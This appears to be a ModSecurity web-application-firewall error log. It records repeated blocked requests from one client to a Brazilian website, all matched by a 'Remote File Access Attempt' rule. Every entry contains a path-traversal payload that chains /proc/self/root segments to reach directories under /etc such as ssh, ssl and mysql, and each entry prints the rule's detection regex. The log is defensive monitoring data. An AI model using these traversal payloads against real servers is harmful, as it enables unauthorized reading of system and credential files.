[Fri Mar 20 09:51:01.387400 2026] [:error] [pid 31215:tid 140411683178240] [client 74.7.243.128:54916] [client 74.7.243.128] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/self/root/etc/pure-ftpd"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "ab1CtQF0L0L-SsrnPo5_ewAAAsc"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/self/root/etc
[Fri Mar 20 09:51:11.907270 2026] [:error] [pid 26799:tid 140411666392832] [client 74.7.243.128:54926] [client 74.7.243.128] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/self/root/etc/ssl"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "ab1Cv9a6ubjKNq_cu4bwlQAAA0k"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/self/root/etc
[Fri Mar 20 09:51:13.287018 2026] [:error] [pid 15826:tid 140411590858496] [client 74.7.243.128:37994] [client 74.7.243.128] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/self/root/etc/ntp"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "ab1CweoXxyEfFpUF8f-XjwAAAVI"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/self/root/etc
[Fri Mar 20 09:51:14.619899 2026] [:error] [pid 31215:tid 140411582465792] [client 74.7.243.128:38000] [client 74.7.243.128] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/self/root/etc/groff"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "ab1CwgF0L0L-SsrnPo5_hgAAAtM"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/self/root/etc
[Fri Mar 20 09:51:15.997801 2026] [:error] [pid 11642:tid 140411540502272] [client 74.7.243.128:38008] [client 74.7.243.128] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/self/root/etc/cloud"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "ab1Cw7ninkcc-iUj5Ap07AAAA5g"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/self/root/etc
[Fri Mar 20 09:51:17.429947 2026] [:error] [pid 15826:tid 140411725141760] [client 74.7.243.128:38018] [client 74.7.243.128] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/self/root/etc/raddb"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "ab1CxeoXxyEfFpUF8f-XkgAAAUI"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/self/root/etc
[Fri Mar 20 09:51:18.778995 2026] [:error] [pid 7893:tid 140411716749056] [client 74.7.243.128:38022] [client 74.7.243.128] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/self/root/etc/ssh"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "ab1CxhCii7xarUs8iHZ-6gAAAgM"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/self/root/etc
[Fri Mar 20 09:51:23.364272 2026] [:error] [pid 21219:tid 140411683178240] [client 74.7.243.128:35146] [client 74.7.243.128] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/self/root/etc/opt"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "ab1Cy_XLqtnMIWvjpaKxMgAAAoc"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/self/root/etc
[Fri Mar 20 09:52:06.542642 2026] [:error] [pid 9818:tid 140411632822016] [client 74.7.243.128:35158] [client 74.7.243.128] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/self/root/etc/avahi"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "ab1C9l1pVZ5mVmJwsFNH3gAAAE0"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/self/root/etc
[Fri Mar 20 09:52:07.923393 2026] [:error] [pid 15826:tid 140411540502272] [client 74.7.243.128:52068] [client 74.7.243.128] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/self/root/etc/rc.d"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "ab1C9-oXxyEfFpUF8f-XtAAAAVg"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/self/root/etc
[Fri Mar 20 09:52:10.677200 2026] [:error] [pid 10189:tid 140411708356352] [client 74.7.243.128:48880] [client 74.7.243.128] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/self/root/etc/pam.d"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "ab1C-jJ3M9BSuKP7CAY4cQAAAIQ"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/self/root/etc
[Fri Mar 20 09:52:12.034407 2026] [:error] [pid 21219:tid 140411725141760] [client 74.7.243.128:48886] [client 74.7.243.128] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/self/root/etc/mysql"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "ab1C_PXLqtnMIWvjpaKxTAAAAoI"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/self/root/etc
[Fri Mar 20 09:52:13.607031 2026] [:error] [pid 11642:tid 140411691570944] [client 74.7.243.128:48894] [client 74.7.243.128] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/self/root/etc/skel"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "ab1C_bninkcc-iUj5Ap1BwAAA4Y"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/self/root/etc
[Fri Mar 20 09:52:14.946938 2026] [:error] [pid 11642:tid 140411733534464] [client 74.7.243.128:48906] [client 74.7.243.128] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/self/root/etc/kernel"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "ab1C_rninkcc-iUj5Ap1CQAAA4E"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/self/root/etc
[Fri Mar 20 09:52:16.257728 2026] [:error] [pid 10189:tid 140411674785536] [client 74.7.243.128:48916] [client 74.7.243.128] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/self/root/etc/rpm"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "ab1DADJ3M9BSuKP7CAY4eQAAAIg"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/self/root/etc
[Fri Mar 20 09:52:17.840999 2026] [:error] [pid 11642:tid 140411741927168] [client 74.7.243.128:48930] [client 74.7.243.128] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/self/root/etc/udev"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "ab1DAbninkcc-iUj5Ap1DAAAA4A"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/self/root/etc
[Fri Mar 20 09:52:19.162320 2026] [:error] [pid 31215:tid 140411632822016] [client 74.7.243.128:48934] [client 74.7.243.128] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/self/root/etc/xdg"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "ab1DAwF0L0L-SsrnPo5_wAAAAs0"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/self/root/etc
[Fri Mar 20 09:52:21.954977 2026] [:error] [pid 7893:tid 140411674785536] [client 74.7.243.128:49040] [client 74.7.243.128] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/self/root/etc/gnupg"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "ab1DBBCii7xarUs8iHZ_NQAAAgg"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/self/root/etc
[Fri Mar 20 09:52:23.458926 2026] [:error] [pid 10189:tid 140411708356352] [client 74.7.243.128:49042] [client 74.7.243.128] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/self/root/etc/dhcp"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "ab1DBzJ3M9BSuKP7CAY4gwAAAIQ"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/self/root/etc
[Fri Mar 20 09:52:24.771944 2026] [:error] [pid 11642:tid 140411574073088] [client 74.7.243.128:49052] [client 74.7.243.128] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/self/root/etc/gss"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "ab1DCLninkcc-iUj5Ap1EQAAA5Q"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/self/root/etc
[Fri Mar 20 09:52:26.083505 2026] [:error] [pid 26799:tid 140411624429312] [client 74.7.243.128:49056] [client 74.7.243.128] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/self/root/etc/ipmi"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "ab1DCta6ubjKNq_cu4bwuQAAA04"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/self/root/etc
[Fri Mar 20 09:52:27.399611 2026] [:error] [pid 31215:tid 140411540502272] [client 74.7.243.128:49070] [client 74.7.243.128] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/self/root/etc/audisp"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "ab1DCwF0L0L-SsrnPo5_xAAAAtg"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/self/root/etc
